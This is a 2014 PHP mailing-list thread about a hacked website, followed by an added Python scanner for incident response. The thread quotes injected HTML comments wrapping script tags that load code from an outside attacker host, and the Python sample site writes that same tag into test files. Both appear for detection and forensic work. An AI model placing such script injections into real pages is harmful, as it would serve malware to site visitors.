------------ Original Message ------------
> Date: Tuesday, October 07, 2014 20:36:00 -0400
> From: Jim Giner <jim.giner@xxxxxxxxxxxxxxxxxx>
> To: php-general@xxxxxxxxxxxxx
> Subject: Re: Re: hacked!!
>
> On 10/7/2014 6:10 PM, Kevin Kinsey wrote:
>> On Fri, Oct 03, 2014 at 07:54:22PM -0400, Jim Giner wrote:
>>> If anyone is interested here is what is being inserted into
>>> random html and php files:
>>>
>>> <!--f853a8--><script type="text/javascript"
>>> src="http://hs-eventogbooking.dk/mytdhzzp.php?id=9625138"></script><!--/f853a8-->
>>>
>>> and
>>>
>>> <!--83b914--><script type="text/javascript"
>>> src="http://n/mytdhzzp.php?id=9625233"></script><!--/83b914-->
>>>
>>
>> Hi Jim,
>>
>> Thanks for being open and sharing this information. I'm sorry I'm
>> late to the party.
>>
>> IANAE on security, but I have some experience with forensics and
>> server administration as well as identifying attack vectors in
>> PHP and ColdFusion and mitigating them.
>>
>> Off the top of my head, this *looks* a tad like code injection
>> via an unknown vector. By chance, are these code snippets
>> attached to the *end* of the files that contain them?
>>
>> Keep copies of the infected files, with accurate timestamps for
>> the date of last modification.
>>
>> If you can obtain server access logs, it would be prudent to
>> search them (with a "find" tool, like Unix 'grep' or the search
>> features of your favorite editor) for the strings in the HTML
>> comment sections, portions of the suspect URLs, etc.
>>
>> Your web host will perhaps listen well if you pay them well, and
>> the less you pay them, the less likely they are to be concerned.
>> However, I would open a ticket and advise them of what has
>> occurred. Ask them some questions, like what kind of security
>> software is installed on their shared server, whether or not they
>> monitor network traffic for suspect packets, *whether or not the
>> server is vulnerable to "bash shell shock" (CVE-2014-6271 and
>> CVE-2014-7169) (also known as "bashdoor")*.
>>
>> If your website has *no* third-party software built in, that's
>> good news, up to a point. It may indeed be that your code is
>> "tough enough" and the hole was not in your code. Given the
>> severity of ShellShock and the fact that your server contains
>> other peoples' sites as well, which may have 3rd party packages
>> that are vulnerable, I might think rather seriously about using a
>> VM, as others have suggested, in the future if at all feasible.
>>
>> Hope this helps,
>>
>> Kevin Kinsey
>>
> I'm afraid I can't keep the info you mentioned since I already
> cleaned this up. Yes - some of the problem was with large chunks
> of code at the bottom of a couple of index.php files. Most of it
> was a small commented out piece of <script> code that called some
> site in Germany. I have a utility to scan every file in my domain
> that helped me find all the occurrences (about 30) which I then
> updated after cleaning them.
>
> Thanks for the tips tho.

When dealing with a hacked site it is always best to snapshot the whole site - not limiting to the documentroot -- making certain to preserve everything including file dates/times, permissions, ownerships, etc., and capturing any hidden directories or files (a common method for leaving backdoors) - before cleaning anything up. That way there is something that can be reviewed at a later stage.

If you haven't been able to pinpoint the source of the intrusion, I would suggest using your utility to scan your site on a very regular basis.

- Richard

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
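Kevin's two checks (find the injected marker blocks in the site's files, noting whether each sits at the end of the file and what its mtime is, then grep the access logs for the same strings), written up as an added example; this is not code from anyone in the thread or Jim's own scanning utility. It builds a constructed sample site in a temp directory using the comment tags and script URL Jim quoted; the log lines in the test are constructed too.

```python
import os
import re
import tempfile

# Matches the injected block quoted in the thread: a six-hex-digit HTML comment pair
# wrapping one external <script>; the backreference requires the closing tag to match.
INJECT_RE = re.compile(
    r"<!--(?P<tag>[0-9a-f]{6})-->\s*<script[^>]*\bsrc=[\"']?(?P<src>[^\"'\s>]+)[\"']?[^>]*>"
    r"\s*</script>\s*<!--/(?P=tag)-->",
    re.IGNORECASE,
)
SCAN_EXT = (".php", ".html", ".htm", ".js")

def scan_tree(root):
    """Walk root; report each injected block, its file mtime and whether it was appended at the end."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(SCAN_EXT):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            for m in INJECT_RE.finditer(text):
                hits.append({"name": fn, "path": path, "tag": m.group("tag"), "src": m.group("src"),
                             "at_end": m.end() == len(text.rstrip()),
                             "mtime": os.path.getmtime(path)})  # record before cleaning, as the thread advises
    return hits

def grep_logs(log_lines, hits):
    """Return access-log lines naming any injected src script or comment tag (Kevin's grep suggestion)."""
    needles = {h["tag"] for h in hits} | {h["src"].split("?", 1)[0].rsplit("/", 1)[-1] for h in hits}
    return [ln for ln in log_lines if any(n in ln for n in needles)]

def build_sample_site():
    """Write a constructed site into a temp dir: one injection appended, one mid-file, one clean page."""
    root = tempfile.mkdtemp(prefix="hacked_site_")
    block = ('<!--f853a8--><script type="text/javascript" '
             'src="http://hs-eventogbooking.dk/mytdhzzp.php?id=9625138"></script><!--/f853a8-->')
    files = {
        "index.php": "<?php echo 'home'; ?>\n<html><body>Home</body></html>\n" + block + "\n",
        "about.html": "<html><head>" + block.replace("f853a8", "83b914") + "</head><body>About</body></html>\n",
        "clean.html": "<html><body>Nothing to see</body></html>\n",
    }
    for name, content in files.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(content)
    return root
```

Run scan_tree over a snapshot copy of the site rather than the live tree, so the mtimes it records are the ones from before cleanup.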